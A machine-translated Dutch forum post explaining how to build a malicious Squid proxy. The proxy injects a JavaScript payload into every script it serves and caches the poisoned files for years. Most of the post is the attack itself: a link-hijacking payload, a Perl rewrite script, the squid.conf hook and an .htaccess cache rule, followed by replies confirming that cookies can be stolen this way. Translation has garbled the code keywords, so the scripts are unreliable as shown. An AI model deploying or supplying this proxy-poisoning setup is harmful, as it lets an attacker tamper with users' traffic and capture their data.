Dit artikel is een spiegelartikel van machinevertaling, klik hier om naar het oorspronkelijke artikel te gaan.

Architect_Programmer_Code Landbouwnetwerk»Architect Andere technologieën Veilige aanval en verdediging Gebruik proxyservers om de privégegevens van gebruikers te kapen
Bekijken: 14819|Antwoord: 3

[Veilige communicatie] Gebruik proxyservers om de privégegevens van gebruikers te kapen

[Link kopiëren]
Geplaatst op 19-01-2015 02:34:56 | | | |
Dit bericht is voor het laatst bewerkt door Mo Xiaowen op 7-6-2015 23:19


Dit kan worden gedaan door simpelweg de configuratie van SQUID aan te passen
Wat is SQUID?
Squid is software die internetgegevens cachet, downloadverzoeken van gebruikers ontvangt en deze automatisch verwerkt. Wanneer een gebruiker een homepage wil downloaden, kan hij een verzoek naar Squid sturen, Squid vragen deze namens hem te downloaden, waarna Squid verbinding maakt met de website en de homepage aanvraagt, en vervolgens de homepage naar de gebruiker stuurt terwijl hij een back-up maakt; wanneer andere gebruikers voor dezelfde pagina solliciteren, stuurt Squid onmiddellijk de opgeslagen back-up naar de gebruiker, zodat de gebruiker het gevoel heeft dat de snelheid vrij hoog is. Squid kan protocollen zoals HTTP, FTP, GOPHER, SSL en WAIS proxy'en, en Squid kan dit automatisch afhandelen, en je kunt Squid instellen op basis van je behoeften om ongewenste dingen te filteren.
Squid kan werken in veel besturingssystemen, zoals AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, enzovoort.
De implementatie is heel eenvoudig:
1. Installeer Squid op één Linux-server.
2. Pas de server aan, voeg een stukje van onze code in alle verzonden javascrip en stuur het eruit.
3. Stel de cachetijd van ons aangepaste js-bestand zo hoog mogelijk in.
Deze methode geldt ook voor websites met SSL ingeschakeld; als de website een onveilige bron laadt (zoals jquery voor een HTTP-site), geven de meeste browsers een waarschuwing, maar weinig mensen letten er op.
Chema zei dat meer dan 5.000 mensen zijn proxy gebruikten een paar dagen nadat hij hem had vrijgegeven, en de meeste mensen gebruikten hem om slechte dingen te doen, omdat ze de proxy gebruikten, dus ze dachten dat het anoniem en veilig was, maar ze hadden nooit verwacht dat de proxyserver ook slechte dingen zou doen.
Maak je kwaadaardige proxyserver
Als je al een Squid-proxyserver hebt, heb je ook een webserver zoals Apache nodig.
Stap 1: Maak een payload aan
Ik gebruik een eenvoudig script als demonstratie om alle hyperlinks naar mijn website te verwijzen.
/etc/squid/payload.js

[mw_shl_code=javascrip verwijder t, waar]voor(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Stap 2: Schrijf een script om alle JS-bestanden te infecteren
/etc/squid/poison.pl
[mw_shl_code=perl, waar]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
Terwijl(<>)
{
  chomp $_;
  als($_ =- /(.*.js)/i)
  {
        $url = $1;
        systeem("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        systeem("chmod o+r /var/www/tmp/$pid-$count.js");
        systeem("kat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        druk "http://127.0.0.1:80/tmp/$pid-$count.js";
  }
  anders
  {
        druk "$_" af;
  }
$count++;
}[/mw_shl_code]
Dit script gebruikt wget om de originele javascrip van de pagina te krijgen en het t-bestand te verwijderen, dan voegt het de code toe in /etc/squid/payload.js en stuurt het aangepaste bestand naar de client, terwijl je de /var/www/tmp-map moet aanmaken en squid daarin bestanden moet laten schrijven. Deze map slaat de aangepaste js-bestanden op.


Stap 3: Combineer het bovenstaande script met Squid
Voeg het toe aan /etc/squid/squid.conf
[mw_shl_code=html,waar]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Stap 4: Zorg dat de cache nooit faalt
/var/www/tmp/.htaccess
[mw_shl_code=html,waar] VerlooptActief op
VervaltStandaard "toegang plus 3000 dagen"[/mw_shl_code]
Dit geeft Apache de opdracht om hem een lange houdbaarheidstijd te geven totdat de gebruiker zijn cache heeft opgeruimd.


Als je deze proxy verbindt, word je door te klikken op een hyperlink naar mijn website gestuurd, en blijft de cache bestaan, zelfs als je de proxy later niet gebruikt. Ik gebruikte gewoon een niet-agressieve payload, en met deze methode kunnen hackers veel meer doen. Herinner jezelf en vrienden eraan voorzichtig te zijn met het gebruik van gratis proxies.





Vorig:Duizenden FLASH transparante materialen
Volgend:De Android-machine schakelt iPhone en iPad binnen enkele minuten af (super makkelijk).

Gerelateerde berichten
Geplaatst op 19-01-2015 08:48:45 |
Ja, alle toegangsgegevens kunnen worden onderschept door de proxyserver, inclusief post-get inzendingen, dus hoe kan privacy worden uitgesproken?
Geplaatst op 19-01-2015 09:53:53 |
Kunnen ze mijn cookies onderscheppen?
 Huisbaas| Geplaatst op 20-01-2015 14:36:06 |
Wu Soft Inquiry Group Geplaatst op 19-1-2015 09:53
Kunnen ze mijn cookies onderscheppen?

Ja                                             
Disclaimer:
Alle software, programmeermaterialen of artikelen die door Code Farmer Network worden gepubliceerd, zijn uitsluitend bedoeld voor leer- en onderzoeksdoeleinden; De bovenstaande inhoud mag niet worden gebruikt voor commerciële of illegale doeleinden, anders dragen gebruikers alle gevolgen. De informatie op deze site komt van het internet, en auteursrechtconflicten hebben niets met deze site te maken. Je moet bovenstaande inhoud volledig van je computer verwijderen binnen 24 uur na het downloaden. Als je het programma leuk vindt, steun dan de echte software, koop registratie en krijg betere echte diensten. Als er sprake is van een inbreuk, neem dan contact met ons op via e-mail.
Mail To:help@itsvse.com